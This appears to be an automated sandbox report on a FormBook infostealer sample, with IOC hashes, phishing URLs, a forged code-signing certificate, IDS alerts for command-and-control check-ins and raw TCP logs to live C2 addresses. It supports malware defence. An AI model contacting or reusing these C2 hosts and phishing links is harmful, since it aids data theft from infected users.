                                                                                                              https://e.trustifi.com/#/fff2a0/670719/6dc158/ef68bf/5e1243/19ce62/f4cd99/c6b84a/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d78873/cd64d0/869af2/e9ab57/7015c1/91dda7/f34c0a/f30b47/688cba/a1d645/18dc79/33d9f9/9ee0a0/c61099/8f2456/8e1864/996369/790047/a93a09/347b17/38082d/363d49/f88c07/81bae2/57a7bb/6027c6/942952/b2de1b/e98aef/6a05c2/91297b/c70871/7f29c3/0a450d/ad0cac/967c2a/e7cb67/6e1193/8c4088/13aef1/e1d296/5056d4/51a97e/89a35b/c13e69/fa274a/5b7c2e/a8c901/02856f/1e0211/03ca84/d7b573/7e0de3/e2bdbb/7cab47/4dd465/addb41/2076e1/85559c/dbcb2d/514505/a6a54e/41e864/abb5a5/e59e4b/8c2df6/7e5cf3/b648da/8fbd98/4c7d8a/08e6a3/72f66f/a49cc6/18211b/1e6a5c/0d4fdeGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 49.51.78.226
                                                                                                              https://jmak-service.com/3225640388Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 49.51.77.119
                                                                                                              https://pozaweclip.upnana.com/Get hashmaliciousUnknownBrowse
                                                                                                              • 170.106.97.195
                                                                                                              MULTIBAND-NEWHOPEUSk9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 209.74.79.41
                                                                                                              XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 209.74.79.41
                                                                                                              BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 209.74.77.109
                                                                                                              hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 209.74.79.42
                                                                                                              5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 209.74.77.107
                                                                                                              gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 209.74.79.40
                                                                                                              0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 209.74.77.107
                                                                                                              NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 209.74.77.107
                                                                                                              9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 209.74.79.41
                                                                                                              OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 209.74.77.107

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\suBpo1g13Q.exe.log

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\suBpo1g13Q.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1216
                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                              Malicious:true
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                              C:\Users\user\AppData\Local\Temp\FxK39HI69

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\waitfor.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                              Category:dropped
                                                                                                              Size (bytes):196608
                                                                                                              Entropy (8bit):1.1211596417522893
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                                              MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                                              SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                                              SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                                              SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.266498862419901
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:suBpo1g13Q.exe
                                                                                                              File size:983'048 bytes
                                                                                                              MD5:d8ba09db25afabba3143cb47dd6b8f37
                                                                                                              SHA1:5e19b80e13c51ac6f3e1d196e5c3b73ecefd5e98
                                                                                                              SHA256:b7b7efd934672f580ac36002b4f9524decc68c309052dbdf16f26c48c6d1d268
                                                                                                              SHA512:b5ddf9ae8ee77ef334fd8883b3957c08b0e3bd0548ba461f7bd98af75c03351d9029657ba041071bd23ec6bf7b34d277cf9929efc693da7bb4987d4ce8f99d44
                                                                                                              SSDEEP:12288:apZsS9yXXWSOsMzYBfol8kUFQSe8IuRQ8Dn68/0WkR:azsd2SnDoGkhSHVnp/0N
                                                                                                              TLSH:D925F73D29BD222BA175C397CBEBF427F538986F3114ACA458D343A94346A4774C326E
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.................0.................. ........@.. ....................... ............@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:90cececece8e8eb0

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4edeba
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:true
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0xD3B6A135 [Wed Jul 22 15:56:37 2082 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Authenticode Signature

                                                                                                              Signature Valid:false
                                                                                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                              Error Number:-2146869232
                                                                                                              Not Before, Not After
                                                                                                              • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                                                                              Subject Chain
                                                                                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                              Version:3
                                                                                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                              Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xede650x4f.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xee0000x5c8.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xeca000x3608
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xf00000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xec55c0x70.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000xebec00xec0002a2e179d56dd1841b2766de2f69fbf3bFalse0.7657139664989406OpenPGP Public Key7.260788180397824IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xee0000x5c80x600256a09270bca9d024079b83872a26034False0.4381510416666667data4.222098654733015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xf00000xc0x2006c109125e14f832f8ee52c566253e4ddFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_VERSION0xee0900x338data0.4393203883495146
                                                                                                              RT_MANIFEST0xee3d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-11T03:23:42.399727+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1051571188.114.97.380TCP
                                                                                                              2025-01-11T03:24:34.151744+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049981202.92.5.2380TCP
                                                                                                              2025-01-11T03:24:49.714073+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105152813.248.169.4880TCP
                                                                                                              2025-01-11T03:24:52.334935+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105152913.248.169.4880TCP
                                                                                                              2025-01-11T03:24:55.059812+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105153013.248.169.4880TCP
                                                                                                              2025-01-11T03:25:00.623837+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.105153113.248.169.4880TCP
                                                                                                              2025-01-11T03:25:06.361418+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051532209.74.77.10980TCP
                                                                                                              2025-01-11T03:25:08.901515+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051533209.74.77.10980TCP
                                                                                                              2025-01-11T03:25:11.603202+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051534209.74.77.10980TCP
                                                                                                              2025-01-11T03:25:14.006163+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1051535209.74.77.10980TCP
                                                                                                              2025-01-11T03:25:20.118806+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105153623.225.159.4280TCP
                                                                                                              2025-01-11T03:25:22.665681+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105153723.225.159.4280TCP
                                                                                                              2025-01-11T03:25:25.197026+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105153823.225.159.4280TCP
                                                                                                              2025-01-11T03:25:27.759474+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.105153923.225.159.4280TCP
                                                                                                              2025-01-11T03:25:33.524521+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105154046.30.211.3880TCP
                                                                                                              2025-01-11T03:25:36.119532+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105154146.30.211.3880TCP
                                                                                                              2025-01-11T03:25:38.736397+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105154246.30.211.3880TCP
                                                                                                              2025-01-11T03:25:41.278253+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.105154346.30.211.3880TCP
                                                                                                              2025-01-11T03:25:47.517154+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051544103.224.182.24280TCP
                                                                                                              2025-01-11T03:25:50.025272+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051545103.224.182.24280TCP
                                                                                                              2025-01-11T03:25:52.613341+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051546103.224.182.24280TCP
                                                                                                              2025-01-11T03:25:55.128049+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1051547103.224.182.24280TCP
                                                                                                              2025-01-11T03:26:02.403771+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051548149.88.81.19080TCP
                                                                                                              2025-01-11T03:26:04.947928+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051549149.88.81.19080TCP
                                                                                                              2025-01-11T03:26:07.494386+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051550149.88.81.19080TCP
                                                                                                              2025-01-11T03:26:29.880732+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1051551149.88.81.19080TCP
                                                                                                              2025-01-11T03:26:36.338277+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051552101.35.209.18380TCP
                                                                                                              2025-01-11T03:26:38.905416+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051553101.35.209.18380TCP
                                                                                                              2025-01-11T03:26:41.522600+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051554101.35.209.18380TCP
                                                                                                              2025-01-11T03:26:44.091940+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1051555101.35.209.18380TCP
                                                                                                              2025-01-11T03:26:50.384642+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051556154.23.178.23180TCP
                                                                                                              2025-01-11T03:26:52.949820+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051557154.23.178.23180TCP
                                                                                                              2025-01-11T03:26:56.104081+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051558154.23.178.23180TCP
                                                                                                              2025-01-11T03:26:58.020315+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1051559154.23.178.23180TCP
                                                                                                              2025-01-11T03:27:03.811881+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051560208.91.197.3980TCP
                                                                                                              2025-01-11T03:27:06.348901+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051561208.91.197.3980TCP
                                                                                                              2025-01-11T03:27:08.955074+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051562208.91.197.3980TCP
                                                                                                              2025-01-11T03:27:12.561931+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1051563208.91.197.3980TCP
                                                                                                              2025-01-11T03:27:18.813215+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105156443.205.198.2980TCP
                                                                                                              2025-01-11T03:27:21.365405+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105156543.205.198.2980TCP
                                                                                                              2025-01-11T03:27:23.923124+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105156643.205.198.2980TCP
                                                                                                              2025-01-11T03:27:26.533155+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.105156743.205.198.2980TCP
                                                                                                              2025-01-11T03:27:33.106849+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051568188.114.97.380TCP
                                                                                                              2025-01-11T03:27:35.682272+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051569188.114.97.380TCP
                                                                                                              2025-01-11T03:27:38.291581+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1051570188.114.97.380TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 11, 2025 03:24:33.217833996 CET4998180192.168.2.10202.92.5.23
                                                                                                              Jan 11, 2025 03:24:33.222873926 CET8049981202.92.5.23192.168.2.10
                                                                                                              Jan 11, 2025 03:24:33.222960949 CET4998180192.168.2.10202.92.5.23
                                                                                                              Jan 11, 2025 03:24:33.257515907 CET4998180192.168.2.10202.92.5.23
                                                                                                              Jan 11, 2025 03:24:33.262497902 CET8049981202.92.5.23192.168.2.10
                                                                                                              Jan 11, 2025 03:24:34.151530981 CET8049981202.92.5.23192.168.2.10
                                                                                                              Jan 11, 2025 03:24:34.151547909 CET8049981202.92.5.23192.168.2.10
                                                                                                              Jan 11, 2025 03:24:34.151566982 CET8049981202.92.5.23192.168.2.10
                                                                                                              Jan 11, 2025 03:24:34.151743889 CET4998180192.168.2.10202.92.5.23
                                                                                                              Jan 11, 2025 03:24:34.151834011 CET4998180192.168.2.10202.92.5.23
                                                                                                              Jan 11, 2025 03:24:34.154488087 CET4998180192.168.2.10202.92.5.23
                                                                                                              Jan 11, 2025 03:24:34.159370899 CET8049981202.92.5.23192.168.2.10
                                                                                                              Jan 11, 2025 03:24:36.125812054 CET5152553192.168.2.10162.159.36.2
                                                                                                              Jan 11, 2025 03:24:36.130821943 CET5351525162.159.36.2192.168.2.10
                                                                                                              Jan 11, 2025 03:24:36.130928040 CET5152553192.168.2.10162.159.36.2
                                                                                                              Jan 11, 2025 03:24:36.143776894 CET5351525162.159.36.2192.168.2.10
                                                                                                              Jan 11, 2025 03:24:36.575207949 CET5152553192.168.2.10162.159.36.2
                                                                                                              Jan 11, 2025 03:24:36.580319881 CET5351525162.159.36.2192.168.2.10
                                                                                                              Jan 11, 2025 03:24:36.580375910 CET5152553192.168.2.10162.159.36.2
                                                                                                              Jan 11, 2025 03:24:49.250540972 CET5152880192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:49.256207943 CET805152813.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:49.256325960 CET5152880192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:49.274996042 CET5152880192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:49.279906034 CET805152813.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:49.713860035 CET805152813.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:49.714014053 CET805152813.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:49.714072943 CET5152880192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:50.828840017 CET5152880192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:51.840661049 CET5152980192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:51.845772982 CET805152913.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:51.845854998 CET5152980192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:51.857460976 CET5152980192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:51.862369061 CET805152913.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:52.334850073 CET805152913.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:52.334870100 CET805152913.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:52.334934950 CET5152980192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:53.371643066 CET5152980192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:54.575426102 CET5153080192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:54.580492973 CET805153013.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:54.580576897 CET5153080192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:54.592302084 CET5153080192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:54.597127914 CET805153013.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:54.597397089 CET805153013.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:55.059683084 CET805153013.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:55.059740067 CET805153013.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:55.059812069 CET5153080192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:56.103322983 CET5153080192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:57.121944904 CET5153180192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:57.127049923 CET805153113.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:24:57.127130032 CET5153180192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:57.135471106 CET5153180192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:24:57.140264988 CET805153113.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:25:00.623390913 CET805153113.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:25:00.623776913 CET805153113.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:25:00.623836994 CET5153180192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:25:00.626774073 CET5153180192.168.2.1013.248.169.48
                                                                                                              Jan 11, 2025 03:25:00.631591082 CET805153113.248.169.48192.168.2.10
                                                                                                              Jan 11, 2025 03:25:05.763879061 CET5153280192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:05.768764019 CET8051532209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:05.768879890 CET5153280192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:05.784127951 CET5153280192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:05.788913012 CET8051532209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:06.361083984 CET8051532209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:06.361356974 CET8051532209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:06.361418009 CET5153280192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:07.290887117 CET5153280192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:08.309659004 CET5153380192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:08.314579010 CET8051533209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:08.314870119 CET5153380192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:08.329047918 CET5153380192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:08.333951950 CET8051533209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:08.901336908 CET8051533209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:08.901355982 CET8051533209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:08.901515007 CET5153380192.168.2.10209.74.77.109
